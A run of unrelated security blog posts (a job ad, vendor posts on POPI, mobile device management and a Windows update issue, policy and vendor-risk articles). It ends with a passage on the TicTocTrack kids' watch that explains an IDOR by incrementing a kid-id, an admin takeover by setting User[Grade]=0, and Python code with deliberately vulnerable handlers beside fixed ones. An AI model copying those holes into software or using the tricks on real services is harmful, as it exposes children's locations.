Who are we looking for?

A senior cyber-security consultant who will work closely with the Chief Operations Officer and the CEO, Brian Honan. You will help BH maintain its customer relationships by delivering to existing clients, and you will also help to win new business. You will be an ambassador for BH’s trusted brand and your calibre will reflect this.

Who are you?

You are a Senior Cyber-security Consultant with a wealth of experience at both a technical level and at senior management level. You have a reputation as a thought leader in cyber-security and data protection, and a strong technical background combined with senior leadership skills. You are a dynamic individual who likes to be challenged, and you have an in-depth knowledge of cyber risk management, cybersecurity, cyber strategy, data protection and business strategy. You will be able to understand the needs of both the C suite and on-the-ground teams, and you will be able to talk to both audiences. You are target driven and passionate about helping customers solve their cybersecurity and data protection risks.

Details of the role

  • Develop stakeholder relationships with executive management in our clients, and proactively develop ongoing service and product recommendations for these clients based on their business needs
  • Define and provide pragmatic security guidance and architectures that balance business benefit and risk
  • Assess and advise on cyber-governance models, data governance models, risk management programs, and data protection compliance frameworks
  • Deliver cybersecurity risk assessments, running assessment workshops with clients
  • Audit and review client cyber projects
  • Examine clients’ cyber-security controls and make appropriate and practical recommendations that achieve robust security or compliance outcomes
  • Consult on security considerations based on system delivery models including internally, hosted, cloud hosted, cloud managed, mobile, etc.
  • Provide pre-sales advice and support, working alongside account managers
  • Research emerging threats, vulnerabilities and security practices/standards to maintain professional relevance
  • Provide complex technical advice, recommendations and consultancy regarding networks, infrastructure, products and services
  • Provide guidance around IaaS, SaaS, and PaaS security best practices
  • Enable clients to achieve certification to the ISO 27001:2013 Information Security Standard.

Your responsibilities

  • Ensure that all BH Consulting clients receive a professional service in line with our company ethos and values
  • Ensure a first-class service to clients is delivered on time and within budget
  • Plan and lead projects while effectively managing resources
  • Lead and mentor junior team members, ensuring a high standard is maintained in line with KPIs
  • Demonstrate confidence in a strong technical skillset to clients in relation to cyber-defence and incident response
  • Deliver independent trusted advisory services to our clients to enable them to manage their risk profile
  • Enable clients to achieve certification to the ISO 27001:2013 Information Security Standard
  • Work with clients to ensure adherence to regulatory, legal, and relevant governance frameworks
  • Manage client relationships and accounts
  • Meet and exceed all KPIs and revenue targets
  • Plan and attend relevant events and conferences to promote the BH Consulting brand.

Core competencies

  • Excellent technical knowledge of cyber-security, information technology, and business risk
  • Strong business understanding and acumen
  • Excellent written and verbal communications skills, able to use a variety of communications styles, language, and media, to effectively build relationships with key stakeholders
  • Have strong attention to detail and ability to present that detail in a dynamic manner based on its audience
  • Excellent planning skills together with project management and prioritisation skills
  • Delivery focused – ensuring projects are delivered on time and within budget
  • Strong analytical problem-solving capabilities
  • Ability to work on own initiative, yet also strong team player
  • Comprehensive understanding of risk management principles and effective risk response strategies
  • Passion and drive – willingness to go that extra mile to achieve a target/objective
  • Be willing to travel both within Ireland and internationally to our widely diverse client base
  • Resilience – ability to meet challenges and pressures head-on and to manage and address set-backs as encountered
  • Collaborative – ability to cooperate and to communicate well, and to resolve differences of opinion quickly and mutually
  • Flexible and adaptable – ability to improvise and adapt to a dynamic business environment.

If this role interests you and you want to join an exciting and growing company, please send your CV to info@bhconsulting.ie.

The post We are hiring – Senior Cybersecurity Consultant appeared first on BH Consulting.

Enterprises non-compliant with POPI Act in South Africa can get fined up to R10 million!

Estimated reading time: 3 minutes

From GDPR in the European Union to now the POPI Act in South Africa, data privacy regulation is slowly making its way across the globe.

The Protection of Personal Information (POPI) Act was passed in South Africa in 2013 and will soon come into effect across the entire country. Like the GDPR in the EU, it is a wide-ranging regulation on data privacy, personal information and data consent which will have a huge impact on how enterprises do business across the entire country. A recent report suggested that only 34% of organizations were compliant with the Act, which makes for a troubling scenario.

If you are an organization based in the country, here is some information which you absolutely need to know:

What is the POPI Act?

Short for the Protection of Personal Information Act, this legislation was passed in 2013 but is yet to be enacted. As per the official South African government website, it is aimed at the following:

  • to promote the protection of personal information processed by public and private bodies;
  • to introduce certain conditions so as to establish minimum requirements for the processing of personal information;
  • to provide for the establishment of an Information Regulator to exercise certain powers and to perform certain duties and functions in terms of this Act and the Promotion of Access to Information Act, 2000;
  • to provide for the issuing of codes of conduct;
  • to provide for the rights of persons regarding unsolicited electronic communications and automated decision making;
  • to regulate the flow of personal information across the borders of the Republic; and
  • to provide for matters connected therewith.

When will it come into effect?

Even though the act was passed in 2013, it is yet to come into effect due to governmental regulations. Currently, the wait is on for a Regulator to be established but most analysts feel it is not long before it comes into effect.

Who will it affect?

The act is intended to regulate how South African businesses collect, store, process and share personal information. Going by that definition, all South African businesses will be affected.

How is personal information defined?

The Act defines “personal information” as information related to an identifiable, living natural person which can include:

  1. Information related to personal differentiators such as race, sex, gender, pregnancy, marital status, etc.
  2. Information related to education, medical history, employment history, etc.
  3. Identifying numbers, symbols, email addresses, physical address etc.
  4. Biometric information
  5. Personal views, opinions
  6. Correspondence sent by the person, etc.

How will it identify businesses?

For starters, businesses have to classify what information they collect about data subjects as “personal information”. Companies will have to comply with the regulations on how personal information may be handled, subject to certain exceptions. “Records” and “sensitive information” must also be identified, and stakeholders will have to be notified in case of any data breaches.

What are the penalties of non-compliance?

Non-compliance can invite serious penalties. It could involve imprisonment for a period of up to 10 years or a fine of up to R10 million (rand), or in some cases, both.

Keeping all this in mind, it is imperative that South African enterprises start preparing for the inevitable and set in motion processes which will ensure full compliance with POPI.

As an IT security partner for your business, Seqrite provides comprehensive security from advanced cyber threats. To know more

The post Enterprises non-compliant with POPI Act in South Africa can get fined up to R10 million! appeared first on Seqrite Blog.

Federal, State Cyber Resiliency Requires Action

It is no shock that our state and local infrastructures are some of the most sought-after targets for foreign and malicious cyber attackers, but the real surprise lies in the lack of preventive measures that are able to curb them. Major attention has been drawn to the critical gaps that exist as a result of an ever-expanding attack surface, making old system architectures an increasing liability.

Recently, the city of Albany, New York became a victim of a ruthless ransomware attack, which created a series of municipal service interruptions. Residents weren’t able to use the city’s services to obtain birth certificates, death certificates or marriage licenses, and the police department’s networks were rendered inoperable for an entire day. This resulted in an enormous disruption of the city’s functionality and made clear that the threat to infrastructure is more real than ever. Bolstering state and local digital defenses should be of the utmost priority, especially as we near the 2020 presidential elections when further attacks on election infrastructure are expected. We must take the necessary precautions to mitigate cyberattack risk.

The reintroduction of the State Cyber Resiliency Act by Senators Mark Warner (D-VA) and Cory Gardner (R-CO), and Representatives Derek Kilmer (D-WA) and Michael McCaul (R-TX), does just that. The legislation demonstrates a critical bipartisan effort to ensure that state, local and tribal governments have a robust capacity to strengthen their defenses against cybersecurity threats and vulnerabilities through the Department of Homeland Security (DHS). States have made clear that they suffer from inadequate resources to deal with increasingly sophisticated attacks, but also the most basic attacks, which require proper safeguards and baseline protection. This bill works to strategically address the challenges posed by a lack of resources to deal with emerging threats.

The possibility of cyber warfare must not be taken lightly and has long been ignored. This bill shows that the status quo of kicking the can further down the road will no longer stand as a “strategy” in today’s political and cybersecurity landscape. Action is necessary to better secure our national security and the systems upon which every sector of our economy relies, from utilities to banking to emergency first responders to hospital networks to election infrastructure. It is our responsibility to create and support the safeguards against bad actors looking for gaps in our infrastructure.

The bill makes states eligible for grants to implement comprehensive, flexible cybersecurity plans that address continuous vulnerability monitoring, protection for critical infrastructure systems and a resilient cybersecurity workforce. States would also be able to repurpose funds to various local and tribal governments. In addition, the bill would implement a 15-person committee to review the proposed plans and track the spending of state and local governments. This committee would help states and localities formulate and deliver annual reports to Congress that detail the program’s progress. The specific funding was not disclosed, but this effort showcases the timeliness of the issue and why it is such an imperative step at this stage in time.

We must take basic steps to ensure the security of our state and local systems, and enable systems to be patched, maintained and protected from outside threats. This bill is a welcome and needed effort by lawmakers to address the existing challenges that states, local governments and infrastructures are dealing with every day. As adversaries become increasingly sophisticated and targeted in their attack strategies, we have a responsibility to equip states and localities with the necessary tools to close and mitigate gaps.

We at McAfee are committed to partnering with federal, state and local governments to equip them with the best strategies to create a better and more secure cybersecurity future.

The post Federal, State Cyber Resiliency Requires Action appeared first on McAfee Blogs.

Continuing Education On Cyber Threats And Defenses

Anyone who has been in cybersecurity for any length of time knows that the threat landscape is constantly changing and requires regular monitoring of news, blogs, podcasts, and other sources to ensure you know what is happening today. I have tried to bring this information to the public since starting my monthly threat webinar series in July of 2015. Over the years, I’ve been able to share information about the different aspects of the threat landscape, from advanced persistent threats (APT) to zero-day exploits and everything in-between. My focus with these webinars is to share information about how these threats work and the technologies available to defend against them. I regularly have experts join me on these webinars too, so you don’t have to just listen to me all the time.

However, my main goal is to help you better understand what you are up against in your fight against threat actors and their ways of attacking you, your employees, systems and networks. I also ask for requests on topics you want me to cover in the future, using a survey option within the webinar platform we use. Each of the webinars is live and allows you to ask questions to be answered either during the live event or afterwards via email. We also record each of these webinars so you can watch them on-demand, as we know your time is valuable and sometimes you cannot attend live or you want to share with your colleagues. Note – if you sign up for any of the on-demand webinars, you will receive an email with the upcoming month’s webinar topic. The April 2019 webinar will cover Bug Bounties and How They Help, and you can sign up to attend here.

Webinars are one way we can help you stay educated and up-to-date about the industry and what’s happening today, as well as what we expect to happen next. You can also follow our other blogs, like Security Intelligence or Security News, for the latest from Trend Micro Research. We also have great explanatory videos on our Trend Micro YouTube channel.

Feel free to leave a comment below if there are any topics you’d like me to cover in upcoming months or if you simply want to say hello. I look forward to seeing you on one of my next webinars.

The post Continuing Education On Cyber Threats And Defenses appeared first on .

Why choose Seqrite mSuite- we give you 5 reasons!

Estimated reading time: 2 minutes

Smartphones are no longer luxuries – in today’s day and age, they are an omnipresent reality. Mobile devices do not just offer connectivity anymore; they are used for many business functions. Business emails, document reviews, editing, and video conferencing are just some of those. To support a mobile workforce, companies issue handhelds such as smartphones, tablets, and laptops that enable employees to work while traveling or from the comfort of their homes. Some companies also support the ‘Bring Your Own Device (BYOD)’ concept, which permits employees to access the company network from their personal handhelds.

To ensure that organizations keep their defenses secure, it is imperative that they protect their company devices with a mobile device management solution. Network administrators can consider the Seqrite mSuite solution for this purpose. This is a powerful solution to increase the productivity of an enterprise by mobilizing the workforce while ensuring that enterprise data remains absolutely secure. The solution allows network managers to get total control over all applications installed on official devices, monitor internet usage patterns, track device location and apply company policies as per the location and time, and provide support through remote device control as well as file transfer. Organizations can remain in total control of what’s happening with their data even beyond their own network.

If you’re still wondering why Seqrite mSuite is the perfect solution for your mobile device management needs, here are five reasons to convince you:

  1. Single Console Management for All Devices

Seqrite mSuite offers easy device management by offering single console management for all devices. Enrolment can be done in minutes, saving precious time with features such as remote ring, locking/unlocking, locating/tracing and wiping of devices. Devices can also be grouped together under one single policy, applied and configured. Devices can also be tracked on a map in real time.

  2. Comprehensive security management

Enterprise administrators don’t need to worry about security with Seqrite’s built-in antivirus that keeps data safe from viruses, Trojans, ransomware and organized cybercrime attacks. Admins can easily schedule a Quick Scan or Full Scan on any enrolled device remotely. Seqrite mSuite offers excellent web security thanks to browsing, phishing and web protection.

  3. Seamless App Management

Applications running on the enrolled devices can be easily managed and secured. Applications and updates can be pushed from server to devices, with blacklisting and whitelisting offered. Users can download apps on demand through the enterprise app store, which establishes control over the use of applications. The device can be transformed to use a single app through the kiosk mode feature.

  4. Easy Data Monitoring & Management

It’s easy to stay in control of all critical data with Seqrite mSuite. Digital boundaries can be defined by applying restrictions on devices with Wi-Fi, Geo, and Time Fence. Data usage can be monitored over mobile and Wi-Fi networks, with interactive reports providing graphical summaries. Multiple default policies offer enhanced security and can be customized for compliance.

  5. Easy to use and customizable

Apart from the above features, Seqrite mSuite offers several features which make it easy to use and customizable. Bulk file distribution can be done from the console to Android devices. The solution also includes third party SMS gateway integration for SMS notification and custom mSuite app distribution for enrolment.

The post Why choose Seqrite mSuite- we give you 5 reasons! appeared first on Seqrite Blog.

PCs fail to boot up/Freeze after receiving Microsoft Windows 9-April-2019 updates and rebooting the PC

Summary: Quick Heal and Seqrite users are reporting that PCs fail to boot up / freeze after installing the 9th April Windows Updates and rebooting the system.

Symptoms: 

  • Users have Quick Heal or Seqrite product installed and running on their systems.
  • The PCs fail to boot up/freeze after installing the Windows Updates of 9-April-2019 and rebooting the system.
  • There are also some reported instances of PC slow-downs, especially on Windows 10 1809.

Affected Operating Systems: 

  • As of now we have cases reported on Windows 8.1 and below (Windows 8/Windows 7).
  • A few cases have been reported on Windows 10, Windows 2008 and Windows 2012 as well.
  • We have also observed other AV vendors facing similar issues on Windows 2008 and 2008 R2, and Windows 2012 and 2012 R2.
  • Windows 10 – system slowness only.

Windows Updates causing the issue (Under Investigation): 

  • Windows 7: KB4493472, KB4493448
  • Windows 10: KB4493509

Information on Windows 9-April-2019 Update Release: 

For more information on Microsoft Windows 9-April-2019 release notes, click here

Workaround:

  • Those who have installed these updates but haven’t rebooted their PCs yet might encounter the same symptoms after a reboot. As a precaution, we recommend that users uninstall the contentious Windows KB updates prior to rebooting.
  • Follow the steps listed here to uninstall the Windows KB updates.
  • For customers already affected by this issue, we recommend rebooting the PC in Safe Mode and uninstalling the Windows KB updates.
  • Follow the steps listed below to reboot the PC in Safe Mode and uninstall the KB updates.
  • Windows 10: Click here
  • Windows 8 and below: Click here
  • Once the Windows KB updates are uninstalled, disable “Automatic Windows Updates” by following the steps listed here.
  • After successful uninstallation of the Windows KB updates, reboot the PC in normal mode.

Note: Disabling Windows Automatic Updates is not recommended in general and should be used only as a temporary measure to avoid the download and installation of the contentious Windows KB updates. Once the issue is addressed, please re-enable Windows Automatic Updates.

IMPORTANT: 

  • Not all users will observe these symptoms, as the issue is potentially related to a timing condition during the boot-up process and is not reproducible every time.
  • Quick Heal / Seqrite Engineering Team is working closely with Microsoft to get this issue addressed on high priority.
  • This KB Article will be updated with additional information on an ongoing basis and we recommend you visit this page to get the latest updates on this issue.

Please get in touch with Quick Heal/Seqrite Technical Support Team for more information or any assistance related to this issue.

The post PCs fail to boot up/Freeze after receiving Microsoft Windows 9-April-2019 updates and rebooting the PC appeared first on Seqrite Blog.

Third Party Security Risks to Consider and Manage

Guest article by Josh Lefkowitz, CEO of Flashpoint
 
Acceptable business risks must be managed, and none more so than those associated with external vendors, who often have intimate access to infrastructure or business data. As we’ve seen in numerous breaches where attackers were able to leverage a weakness in a contractor or service provider, third-party risk must be assessed and mitigated during the early stages of such a partnership, as well as throughout the relationship.
 
The following tips can help security decision makers more effectively address the risks posed by relationships with technology vendors.
 
Do Your Homework
Conducting thorough due diligence on a prospective vendor is essential. Organisations could evaluate technical and regulatory risk through due diligence questionnaires, for example, or even on-site visits if necessary. The point is to evaluate not only a third party’s information security risk, but compliance with regulations such as GDPR for privacy and PCI DSS for payment card security, for example. An organisation may also want to evaluate a third party’s adherence to industry standards such as NIST or ISO in certain security- and privacy-related areas.
 
Next, consider what this compliance information doesn’t tell you. What do you still need to learn about the vendor’s security posture before deciding whether you’re comfortable with it? Think about what questions you still have and, if possible, seek answers from the vendor’s appropriate security contact. Here are some questions to pose:
  • When was your last penetration test? Is your remediation on schedule?
  • Have you documented security incidents? How did you remediate those incidents?
  • Do you have the result of your last business continuity test? If yes, can you share it?
  • What security controls exist for your users? Do they use multifactor authentication, etc.?
  • How are you maturing your security program?
  • Are you ISO, SOC 1/SOC 2, and NIST compliant, and is there documentation to support this?
 
Additional Security: It’s All in the Controls
If you’re unsatisfied with the answers from a potential partner regarding their security, it’s OK to walk away, especially if you make the determination that working with the vendor may not be critical to your business.  

That’s not always the case, however. If you must partner with a particular third party and if no other reputable vendors offer anything comparable, you will likely need to implement additional technical and/or policy controls to mitigate the security risks associated with your business’s use of the offering, such as:
 
Technical
These are typically restrictions on the access and/or technical integrations of vendor offerings. For example, if a product is web-based but unencrypted, consider blocking users on your network from accessing its website and, provided the proper authentication is in place, using its API instead. In most cases there are two options: remediation or compensating controls.
  • Remediation: Can you work with the vendor to remediate the technical risk?
  • Compensating controls: If you cannot remediate the risks entirely, can you establish technical compensating controls to minimise or deflect the risk?
 
Policy
These are policies that users of the offering should follow, such as limits on the types and amounts of data that can be input securely. Some typical policy scenarios include:
  • Regulatory compliance: For example, a vendor’s non-compliance could mandate that you walk away from a third-party relationship.
  • Contractual obligations: Are there contractual obligations in place with your existing clients that prevent you from working with vendors who don’t meet certain security and privacy standards?
  • Security best practices: Ensure your policies around risk are enforced and determine whether they may conflict with your vendors’ policies.
 
Asset Inventory is a Must
There are several reasons why it’s imperative to know which of your business’s assets the vendor will be able to store and/or access. For one, this knowledge can help identify and shape any additional security controls. Second, having this knowledge on hand is crucial should the vendor suffer a breach. Knowing exactly what assets were impacted, as well as who is doing what with your inventory, can expedite your response and identify and mitigate any exposure efficiently and effectively.
 
Response Plans Must Include Partners
Before finalising a vendor relationship, it’s crucial to use all the information gathered during your due diligence process to construct a response plan in preparation for any future incidents the vendor might experience. Tracking the assets to which your vendor has access is one component of an effective response plan. Others include courses of action to mitigate exposure, disclosure and notification procedures, external communications strategies, and plans to re-evaluate the vendor’s security and remediation following an incident.
 
The most effective way to manage vendor risk would be not to work with any external vendors in the first place, but that isn’t a feasible strategy. The most secure and successful vendor relationships are rooted in preparation and transparency. Thoroughly understanding all facets of a vendor’s security program, implementing additional controls as needed to appropriately safeguard your business’s assets, and being prepared to respond to future incidents can go a long way toward reducing the business risks associated with any vendor relationship.
Josh Lefkowitz, CEO of Flashpoint

How to Track Your Kids (and Other People’s Kids) With the TicTocTrack Watch

Do you ever hear those stories from your parents along the lines of "when I was young..." followed by a tale of how risky life was back then compared to today? You know, stuff like having to walk themselves to school without adult supervision, crazy stuff like that which we somehow seem to worry much more about today than we did then. Never mind that far fewer kids go missing today than 20 years ago and there's much less chance of them being hit by a car; circumstances are such today that parents are more paranoid than ever.

The solution? Track your kids' movements, which brings us to TicTocTrack and the best way to understand their value proposition is via this news piece from a few years ago:

Irrespective of what I now know about the product and what you're about to read here, this sets off alarm bells for me. I've been involved with a bunch of really poorly implemented "Internet of Things" things in the past that presented serious privacy risks to those who used them. For example, there was VTech back in 2015 who leaked millions of kids' info after they registered with "smart" tablets. Then there was CloudPets leaking kids' voices because the "smart" teddy bears that recorded them (yep, that's right) then stored those recordings in a publicly facing database with no password. Not to mention the various spyware apps often installed on kids' phones to track them which then subsequently leak their data all over the internet. mSpy leaked data. SpyFone leaked data. Mobiispy leaked data. And that's just a small slice of them.

And then there's kids' smart watches themselves. A couple of years back, the Norwegian Consumer Council discovered a whole raft of security flaws in a number of them which covered products from Gator, GPS for barn and Xplora:

These flaws included the ability for "a stranger [to] take control of the watch and track, eavesdrop on and communicate with the child" and "make it look like the child is somewhere it is not". These issues (among others), led the council's Director of Digital Policy to conclude that:

These watches have no place on a shop’s shelf, let alone on a child’s wrist.

Referencing that report, US Consumer groups drew a similar conclusion:

US consumer groups are now warning parents not to buy the devices

The manufacturers fixed the identified flaws... kind of. Two months later, critical security flaws still remained in some of the watches tested, the most egregious of which was with Gator's product:

Adding to the severity of the issues, Gator Norge gave the customers of the Gator2 watches a new Gator3 watch as compensation. The Gator3 watch turned out to have even more serious security flaws, storing parents and kids’ voice messages on an openly available webserver.

Around a similar time, Germany outright banned this class of watch. The by-line in that piece says it all:

German parents are being told to destroy smartwatches they have bought for their children after the country's telecoms regulator put a blanket ban in place to prevent sale of the devices, amid growing privacy concerns.

Wow - destroy them! The story goes on to refer to the German Federal Network Agency's rationale, which includes the fact that "parents can use such children’s watches to listen unnoticed to the child’s environment". This is a really important "feature" to understand: these devices aren't just about tracking the kids' whereabouts, they're also designed to listen to their surroundings... including their voices. Now on the one hand you might say "well, parents have a right to do that". Maybe so, maybe not, you'll hear vehement arguments on that both ways. But what if a stranger had that ability - how would you feel about that? We'll come back to that later.

Around a year later, Pen Test Partners in the UK found more security bugs. Really bad ones:

Guess what: a train wreck. Anyone could access the entire database, including real time child location, name, parents details etc.

This wasn't just bad in terms of the nature of the exposed data, it was also bad in terms of the ease with which it was accessed:

User[Grade] stands out in there. I changed the value to 2 and nothing happened, BUT change it to 0 and you get platform admin.

So change a number in the request and you become God. This is something which is easily discovered in minutes either by a legitimate tester within the organisation building the software (which obviously didn't happen) or... by someone with malicious intent. The Pen Test Partners piece concludes:

We keep seeing issues on cheap Chinese GPS watches, ranging from simple Insecure Direct Object Request (IDOR), to this even simpler full platform take over with a simple request parameter change.

Keep that exploit in mind - insecure direct object references are as simple as taking a URL like this:

example.com/get-kids-location?kid-id=27

And changing it to this:

example.com/get-kids-location?kid-id=28

The level of sophistication required to exploit an IDOR vulnerability boils down to being able to count. That was in January this year; fast forward a few months and Ken Munro from Pen Test Partners contacts me. He's found more serious vulnerabilities in the services these devices use and in particular in TicTocTrack's product. He believes the same insecure direct object reference issues are plaguing the Aussie service and he needs someone on the ground here to help establish the legitimacy of the findings.
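The two flaws just described, the IDOR on a kid-id and the Gator `User[Grade]` parameter change, as an added Python sketch that is not code from TicTocTrack, Gator or Pen Test Partners: each handler is shown in its vulnerable form beside the fix, with constructed parents, kids, ids and coordinates.

```python
# Added example, not code from TicTocTrack, Gator or Pen Test Partners: an
# in-memory sketch of the two bugs the post describes. Kids, parents, ids
# and coordinates are constructed; the "grade" field mirrors the
# User[Grade] parameter quoted above (0 = platform admin).
from dataclasses import dataclass
from typing import Dict, Tuple


class NotFound(Exception):
    """Object missing, or not visible to the caller (same answer for both)."""


class Forbidden(Exception):
    """Client tried to write a field it is not allowed to set."""


@dataclass(frozen=True)
class Kid:
    kid_id: int
    parent_id: int                  # the account allowed to see this child
    name: str
    location: Tuple[float, float]   # (lat, lon), constructed values


# Constructed sample data: two parent accounts, each with one child.
KIDS: Dict[int, Kid] = {
    27: Kid(27, parent_id=100, name="Elle", location=(-28.03, 153.43)),
    28: Kid(28, parent_id=200, name="Sam", location=(-27.47, 153.02)),
}
PROFILES: Dict[int, dict] = {
    100: {"display_name": "parent-a", "phone": "0400000001", "grade": 2},
    200: {"display_name": "parent-b", "phone": "0400000002", "grade": 2},
}
# Fields a logged-in user may change about themselves. "grade" is not one.
UPDATABLE_PROFILE_FIELDS = {"display_name", "phone"}


def get_kids_location_vulnerable(session_user_id: int, kid_id: int):
    """IDOR: the caller is authenticated, but kid_id is trusted as-is.
    Counting from 27 to 28 returns another family's child."""
    kid = KIDS.get(kid_id)
    if kid is None:
        raise NotFound(kid_id)
    return kid.location


def get_kids_location_fixed(session_user_id: int, kid_id: int):
    """Scope the lookup to the caller: the id alone never grants access.
    A child that exists but belongs to someone else gets the same NotFound
    as a missing id, so the endpoint cannot be used to enumerate ids."""
    kid = KIDS.get(kid_id)
    if kid is None or kid.parent_id != session_user_id:
        raise NotFound(kid_id)
    return kid.location


def update_profile_vulnerable(session_user_id: int, form: dict) -> dict:
    """Mass assignment: every submitted key is written, so a client can
    post grade=0 and promote itself, as in the Gator finding quoted above."""
    PROFILES[session_user_id].update(form)
    return PROFILES[session_user_id]


def update_profile_fixed(session_user_id: int, form: dict) -> dict:
    """Allow-list the writable fields; privilege is never client-supplied."""
    rejected = set(form) - UPDATABLE_PROFILE_FIELDS
    if rejected:
        raise Forbidden(sorted(rejected))
    PROFILES[session_user_id].update(form)
    return PROFILES[session_user_id]


if __name__ == "__main__":
    # Parent 100 asks for kid 28 (not theirs): the vulnerable handler answers.
    print("vulnerable:", get_kids_location_vulnerable(100, 28))
    try:
        get_kids_location_fixed(100, 28)
    except NotFound:
        print("fixed: not found for someone else's child")
    # Self-promotion through an unexpected form field.
    print("vulnerable grade:", update_profile_vulnerable(100, {"grade": 0})["grade"])
    try:
        update_profile_fixed(200, {"display_name": "x", "grade": 0})
    except Forbidden as exc:
        print("fixed: rejected", exc)
```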

To test Pen Test Partners' theory, I decided to play your typical parent in terms of the buying and setup process and use my 6-year old daughter, Elle, as the typical child. She's smack bang in the demographic of who the watch is designed for and I was happy to give Ken access to her movements for the purposes of his research. So it's off to tictoctrack.com.au where the site leans on its Aussie origins:

I can understand why companies emphasise the "we host your data near you" mantra, but in practical terms it makes no difference whether it's in Australia or, say, the US. You're also often talking about services that are written and / or managed by offshore companies anyway so where the data physically sits really is inconsequential (note: this is assuming no regulatory obligations around co-locating data in the country of origin). The "we take the security of your data seriously" bit, however, always worries me and as you'll see shortly, that concern is warranted.

The Aussie angle comes up again further down the page too:

At this point it's probably worthwhile pointing out that despite the Aussieness asserted on the front page, the origin of the watch isn't exactly very Australian. In fact, the watch should be rather familiar by now:

So for all the talk of TicTocTrack, the hardware itself is actually Gator. In fact, you can see exactly the same devices over on the Gator website:

It's not clear how they arrived at the conclusion of "the world's most reputable GPS watch for kids and elders", especially given the earlier findings. And who is Gator? They're a Chinese company located in Shenzhen:

The country of origin would be largely inconsequential were it not for TicTocTrack's insistence on playing the Aussie card earlier on. It's also relevant in light of the embedded media piece at the start of this blog post: this isn't "a new device developed by a Brisbane mother" nor is the mother "the creator of the watch". In fairness to Karen Cantwell, it wasn't her making those claims in the story and the media does have a way of spinning things, but it's important to be clear about this given how this story unfolds from here.

Regardless, let's proceed and actually buy the thing. I get Elle involved and allow her to choose the colour, with rather predictable results:

The terms and conditions were actually pretty light (kudos for that!) but the link to the privacy and security policies was dead. I go through the checkout process and buy the watch:

iStaySafe Pty Ltd is the parent company and we'll see that name pop up again later on. An email promptly arrives with a receipt and a notice about the order being processed, albeit without a delivery time frame mentioned. With time to kill, I decide to poke around and take a look at how the tracking works, starting with the link below:

Turns out the tracking app is a totally different website running on a totally different hosting provider in a totally different state:

The primary site is down in Melbourne whilst the tracking site is in Brisbane per the info on the front page. My credentials from the primary site don't work there and registering results in me needing to choose a reseller:

Here we see iStaySafe again, but it's the other resellers (all Aussie companies) that help put the whole Gator situation in context. Uniting Agewell provides services to the elderly and when considering the nature of the Gator watch, it made me think back to a comment on the Chinese manufacturer's website: "the world's most reputable GPS watch for kids and elders". Cellnet is a publicly listed company with a heap of different brands. Weareco produces uniforms. eHomeCare provides "smart care technology for healthy ageing" and their product page on the GPS tracking watch explains the relationship:

As it turns out, attempting to sign up just boots me back to the TicTocTrack website so I assume I just need to wait for the watch to arrive before going any further. Still, this has been a useful exercise to understand not just how the various entities relate to each other, but also because it shows that the scope of this issue isn't just constrained to kids, it affects the elderly too.

A few days later, this lands in the mail:

I'm surprised by how chunky it is - this is a big unit! For context, here it is next to my series 4 Apple Watch (44mm - the big one):

I'm not exactly expecting Apple build quality here (and as you can see from the pic, it's a long way from that), but this is a lot to put on a little kid's wrist. You can see the access port for the physical SIM card (more on that later), as opposed to Apple's eSIM implementation so it's obviously going to consume a bunch of space when you're building a physical caddy into the design to hold a chip on a card.

Regardless, let's get on with the setup process and I'm going to be your average everyday parent and just follow the instructions:

The app is branded TicTocTrack and is published by iStaySafe:

Popping it open, the first step is registration (the mobile number is a pre-filled placeholder):

I'm surprised by the empty space at the top and the bottom - just which generation of iPhone was this designed for? Certainly not the current gen XS, does that resolution put it back in about the iPhone 5 era from 2012? That'd be iOS 6 days which their user manual seems to suggest:

Whilst the aesthetics of the app might seem inconsequential, I've always found that it's a good indicator of overall quality and is often accompanied by shortcomings of a more serious nature. It's the little things that keep popping up, for example the language and grammar in the aforementioned user manual. Why is it "Support Platforms" and then "Supported devices"? And why is the opening sentence of the doc so... odd?

Welcome to TicTocTrack® User Manual! You are about to begin your journey with the live tracking with your family.

That sort of language appears every now and then, for example in the password reset section:

If you forget your password, please use web portal to obtain new password.

It has me wondering how much of this was outsourced overseas and again, that wouldn't normally be worth mentioning were it not for the emphasis placed on the Aussie origins of the service (I know, despite it being a Chinese watch). The actual origins of the service become clear once you look at the download links for the app:

Searching for that same "Nibaya" name on the TicTocTrack website turns up several different versions of the user manual:

It turns out that Nibaya is a Sri Lankan software development company with a focus on quality control and quality assurance:

We're also told by the browser that they're "Not secure" which is not a great look in this day and age. They do in fact have a certificate on the site, only thing is it expired two and a half years ago and they haven't bothered to renew it:

Moving on, there's a mobile phone number verification process which sends an SMS to my device:

Only thing is, the keyboard defaults back to purely alphabetical after every character is typed so unless you pre-fill the field from the SMS (which iOS natively allows you to do), it's a bit painful. Again, it's all the little things.

Following successful number verification, the app fires up and asks for access to location data:

Based on what I'd already read in the user manual, my location data can be used to direct me to a child wearing the watch so requesting this seems fine for that feature to function correctly.

Next is the money side of things and we're looking at $20 a month for the "Full Service Subscription":

If I'm honest, I'm still a bit confused about what this entails. Is this for the tracking service? Or for the Telstra SIM which it shipped with and is identically priced?

Or is it for both? I'm assuming both but then when I look at the service plans on the website, none of them are priced at $19.99. Regardless, I take the $20 option and move on:

The adding a device bit I get - I'm going to need to pair the watch - but the subscription bit further confuses me because I've literally just bought a subscription on the previous screen! For my purposes I don't see myself needing it for any more than 7 days anyway so I'm not too concerned, let's go and add that new device:

A new TicTocTrack watch it is:

And let's go with the supplied SIM which then leads us to the device and SIM registration page:

The IMEI is the identifier of the device itself (the watch) and that can be scanned off the barcode in the packaging. The SIM ID relates to the pre-packaged SIM from Telstra, the barcode for which is under one of the grey obfuscation boxes in the earlier image. I call the device "Elle", register it and that's that.

Lastly, I insert the SIM into the watch (the metal flap for which opens in the opposite direction to the video tutorial and took me a good 5 minutes to work out for fear of breaking it), then drop it onto the power. Give it a couple of hours to charge, boot it up and shortly afterwards it's showing a 3G connection:

I give it a little time to sync to the TicTocTrack service then successfully find it in the app:

Drilling down on Elle's profile, I get an address and GPS coordinates which are both pretty accurate:

To its credit, the watch does a pretty good job of the setup and tracking process once you're past some of the earlier hurdles. At this stage, I now have a device which is broadcasting its location reliably and I can successfully see it in the app. I'm not going to go through other features such as the ability to send an SOS or make a call, at this stage all I really care about is that the watch is now tracking her movements.

The next day, we head off to tennis camp (it's school holiday time) with the TicTocTrack / Gator on her wrist:

She isn't aware of why she has the watch, to her it's just a new cool thing she gets to wear. And it's pink so that's all boxes ticked. She's now at the local court whilst I (in my helicopter parent mode), am sitting at home watching her location on my device:

Safe in the knowledge that my little girl is in a place that I trust, I get back to work. But someone else is also watching her location, someone on the other side of the world who is now able to track her every move - it's Ken. Not only is Ken watching, as far as TicTocTrack is concerned he's just taken her away:

